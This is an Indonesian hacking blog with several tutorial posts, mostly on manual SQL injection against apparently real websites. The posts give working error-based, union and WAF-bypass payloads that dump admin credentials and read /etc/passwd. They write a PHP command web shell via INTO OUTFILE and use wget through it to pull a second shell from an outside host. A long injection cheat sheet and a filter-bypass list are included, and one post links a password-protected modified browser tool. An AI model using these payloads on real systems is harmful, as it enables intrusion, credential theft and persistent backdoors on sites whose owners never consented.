Subscribe:

Ads 468x60px

Kamis, 21 Agustus 2014

w3af broken after update on Kali 1.0.7


This error
w3af failed to start with the following message: Exception: "There was an error while importing w3af.plugins.output.console: "No module named darts.lib.utils.lru"."












fixed
apt-get install python-setuptools << jika error lewatin step selanjut nya
git clone https://github.com/deterministic-arts/DartsPyLRU.git
cd DartsPyLRU
python setup.py install
reference  and this

Selasa, 01 Juli 2014

Double Query Based Injection

Assalamualaikum
bertemu lagi dengan saya, kali ini tutorial mengenai double query injection :D

target sensor yah :D
http://janda.com/pro.php?id=8

kasih tanda petik dan perhatikan error nya

kemudian kita cari version nya dengan perintah
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

version nya : 5.0.96-log

sekarang cari database nya
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

hasilnya : information_schema
pada +LIMIT+0,1 kita ubah aja misal 1+1 2+1 dst

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
database: challanich




sekarang mencari tabel dari database challanich

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1




beruntung langsung ada kata admin :D
table: ch_admin
sama seperti di atas limit 0+1 bisa di rubah seperti tadi

okay lanjut, sekarang melihat column dari table ch_admin

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1




perhatikan warna merah yah

nah limit nya kitah ubah lagi

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=


janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1




janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1



jadi kita simpulkan yang penting : user+password

sekarang dump
janda/pro.php?id=8+and+(select 1 from(select+count(*),concat((select+concat(user,0x3a,password,0x3a) from ch_admin+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1
liat yang berwarna merah



 okay sekian dan terima kasih
semoga bermanfaat :D



Minggu, 01 Juni 2014

SQL Injection Load File



target
https://www.target.com/ajax_city_all_branch.php?state=PANAJI

kasih tanda petik
https://www.target.com/ajax_city_all_branch.php?state=PANAJI'


error sqli, gunakan perintah order by 2--


sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' order by 1--+
sudah tidak error

sekarang gunakan https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select 1--+


liat user nya
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select user()--+

nahh root
syarat melakukan ini ada 2

For creating any file on the website with SQL queries two things are most important

:)
1) Root Path ( We have it by ERROR :) )
2) File Privilages for the Current MySQl User :D we have File Privilages as well :D

selanjutnya
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah

 nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya :D

https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+


 sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak

https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt

"wine ganteng" nya di ubah ke hex yah :D



Coba sekarang kita masukan ini buat mendonwload bekdor :P
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_branch.php?state=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -

Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt 
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php

terus buka dah

sekian dan terima kasih :D
gretz to ch3rn0by1 | tr0jan | G_26 and you

Sabtu, 12 April 2014

Playing With SQLi Output

Assalamualaikum, numpang share :D

#PART 1
Menampilkan semua table dalam database
target/v2/news.php?id=90'  div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),3,4,5,6-- -


















#PART 2
Menampilkan seluruh database, table dan column dalam satu perintah
target/v2/news.php?id=90'  div 0 UniOn SeleCt 1,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_name,0x2f,column_name))))x),3,4,5,6-- -

















 #PART 3
Menampilkan semua table dengan memberi nomor urutan
/news.php?id=90'  div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,@running_number:=@running_number+1,0x2e20,table_name))))x),3,4,5,6-- -

















#PART 4
Menampilkan versi mysql dan nama kita menggunakan  tag dengan html
target/news.php?id=90'  div 0 UniOn SeleCt 1,concat('<b><font color=green size=4><center>InjeCted By wine<br><font color=blue>MySql Version :: <font color=red>',@@version),3,4,5,6-- -

#PART 5
Menampilkan dan membuat table
/news.php?id=90'  div 0 UniOn SeleCt 1,concat(0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20,version(),0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user(),0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c2f7461626c653e),3,4,5,6-- -





Okay sampai disini dulu, semoga bermanfaat. See u next time

Video SQLi Bypass Mod_Security


Assalamualaikum
This is video about SQLi Bypass Mod_security

 

thanks for watching
Special thank to Ajakaro | MakMan | MadC0de | Fuad | G_26 | Ch3rn0by1 And Indonesian Backtrack Team
 

Jumat, 04 April 2014

Modifikasi Add-ons Hackbar pada Mozilla


Assalamualaikum

hackbar adalah add-ons pada mozilla yang berfungsi untuk menguji sistem kita misalnya sqli dan xss
okay langsung aja download hackbar yang sudah di modifikasi sama teman saya T-Pro :D

http://www.mediafire.com/download/8pmciacmca3pgb7/hackbat_mod_by_tPRO_v1.4.1.rar

pass: /!"§$%&~hackforums~/()~TPRO~=?

download dan ekstrak
di dalam ada file berekstensi .xpi
setelah itu copy ke C>program files>mozilla
kemudian drag dan drop pada mozilla nya, terus install
hasilnya hackbar telah terinstall










okay sekian dan terima kasih

Senin, 31 Maret 2014

SQL Injection Cheat Sheet

SQL Injection Cheat Sheet:

Comments
/* – Multi line comment.
# – single line comment.
-- – single line comment.
/*!*/ – Mysql special comments.
Whitespaces.
+, %2B, %20, %09, %0d ,%0А, /**/, /*foo*/
Global system variables
@@datadir // Mysql data directory.
@@version_compile_os - //OS Mysql is running on.
@@version – //Mysql database version.
user() – //Current database user.
@@log_error – //Path to error log.
database() – //Current database.

The INFORMATION_SCHEMA database is made up of the following objects:

SCHEMATA
TABLES
COLUMNS
STATISTICS
USER_PRIVILEGES
SCHEMA_PRIVILEGES
TABLE_PRIVILEGES
COLUMN_PRIVILEGES
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
TABLE_CONSTRAINTS
KEY_COLUMN_USAGE
ROUTINES
VIEWS
TRIGGERS
PROFILING

Columns in a SELECT.
file.php?var=1 order by 10-- //Unknown column ’10′ in ‘order clause’
file.php?var=1 and(select * from table)=(1)-- //Operand should contain 9 column(s)
Encoding. //For matching collations.
file.php?var=1 union select cast(version() as latin1)-- //5.0.11
file.php?var=1 union select convert(version() as binary)-- //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)-- //5.0.11
file.php?var=1 union select unhex(hex(versions()))-- //5.0.11
File_priv.
file.php?var=1 union select user()-- //Checking current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user=’root’-- //Checking for the file priveledge on current user, Y =Yes N=No.
file.php?var=1 union select load_file(‘/etc/passwd’)-- // Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)-- // Loading system files with error based injection.
file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’-- // Write code to a file.
file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”--+ //Write to a file.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*select*/ version()-- //MySQL comments.
file.php?var=1 unUNIONion seleSELECTct version()-- //Filter bypass
file.php?var=1/**/union/**/select/**/version()-- //Whitespace bypass
file.php?var=1 UnION SElecT version()-- //Mixed upper/lower
file.php?var=1 uni/**/on sel/**/ect version()-- //php comments.
file.php?var=1 uni%6Fn select version()-- //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- //Taking advantage of a WAF that only decodes input once.
file.php?var=1 0×414141414141414141414141414141414141 union select version()-- //Buffer overflow.
file.php?var=1 union select 0x3a3a3a-- //Encode to bypass magic quotes.
Extracting data from MySQL errors.
Rand()
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --
Name_const(Mysql 5.0.12 > 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--
Extractvalue & updatexml (MySQL 5.1+)file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))-- //Xpath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()))-- //Xpath error
Misc.
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- //Credits Blackfan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a--
Injecting into an order byfile.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--
file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
Blind.
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW())))-- //time based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3))-- //Time based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{,},[,],:,;, ,’)),1,1) FROM information_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))--
If Statement SQL Injection Attack Samples
SELECT IF(user()='root@localhost','true','false')
Load File
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
Create User
CREATE USER username IDENTIFIED BY 'password'; --
Drop User
DROP USER username; --
Make user to DBA
GRANT ALL PRIVILEGES ON *.* TO username@'%';
List Users

SELECT * FROM 'user' WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user

Getting user defined tables SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
Getting Column NamesSELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’tblUsers -> tablename
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
find table which have a column called 'username'
String without Quotes
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

referensi

Rabu, 26 Februari 2014

SQL Injection 'order by 10000' and still not error?


assalamualaikum
okay sesuai judul
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak mengkasilakan apa2

target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2












coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya













wew pas di kecilin muncul lagi tulisan nya














berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya













coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -













dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya

udah gitu aja, semoga bermanfaat

Kamis, 30 Januari 2014

Bypass WAF filter in SQLI


assalamualaikum
kali ini tentang bagaimana membypass filter waf pada bug sqli

secara manual, kenapa manual soal nya sqlmap nya lg bobo :P
okay langsung aja
target:
http://www.target.com/ebookcontents.php?id=95'













yaps bug sqli
kemudian lanjut dah pake perintah "order by" , cari kolom nya
http://www.target.com/ebookcontents.php?id=95 order by 7--
Unknown column '7' in 'order clause'











lanjut sampe dapat :D
ternyata ada 6 kolom
http://www.target.com/ebookcontents.php?id=95 order by 6--


terus cari angka ajaib nya dengan perintah "union select"
http://www.target.com/ebookcontents.php?id=95 union select 1,2,3,4,5,6--
dan hasil nya Not Acceptable kemungkinan ada waf, mari kita coba bypass
kita ganti kata "union select" dengan
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,3,4,5,6--













ew bisa di buka ternyata, disini saya memilih angka 3 :D
coba kita liat versi mysql berapa dia
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,version(),4,5,6--
dia pake versi 5.5.34-cll













lanjut dah kita liat isi database nya dengan perintah
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,group_concat(table_name)(0x3c62723e,table_name)*/,4,5,6 from information_schema.tables where table_schema=database()--
dan hasil nya  Not Acceptable, mungkin harus alay kali yah syntax nya, kita coba dengan cara ini

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(0x3c62723e,table_name)*/,4,5,6 +from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
dan hasil nya












heheh bisa dah, ada banyak isi "database" nya, mari kita fokus pada database "users"
masukkan perintah ini

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(Group_Concat(table_name))*/,4,5,6 from information_schema.tables where table_schema=database()--

hemm banyak table nya uyy,
disini saya memilih table "users"













http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!column_name*/)),4,5,6 from /*!information_schema*/.columns where /*!table_name*/=0x7573657273--+

dan hasil nya ada id,email,password,date












mari kita dump :P

http://www.trnres.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!email,0x3a,password*/)),4,5,6/*!from*/ /*!users*/

dan hasil nya












bonus dah













tips dan trik
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6. id=1+UnIoN+SeLecT 1,2,3—
7. id=1+UnIOn/**/SeLect 1,2,3—
8. id=1+UNIunionON+SELselectECT 1,2,3—
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12. id=1+un/**/ion+sel/**/ect+1,2,3--
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

And


UNION SELECT Bypassing ::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only


after id no. like id=1 +/*!and*/+1=0

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

ok semoga bermanfaat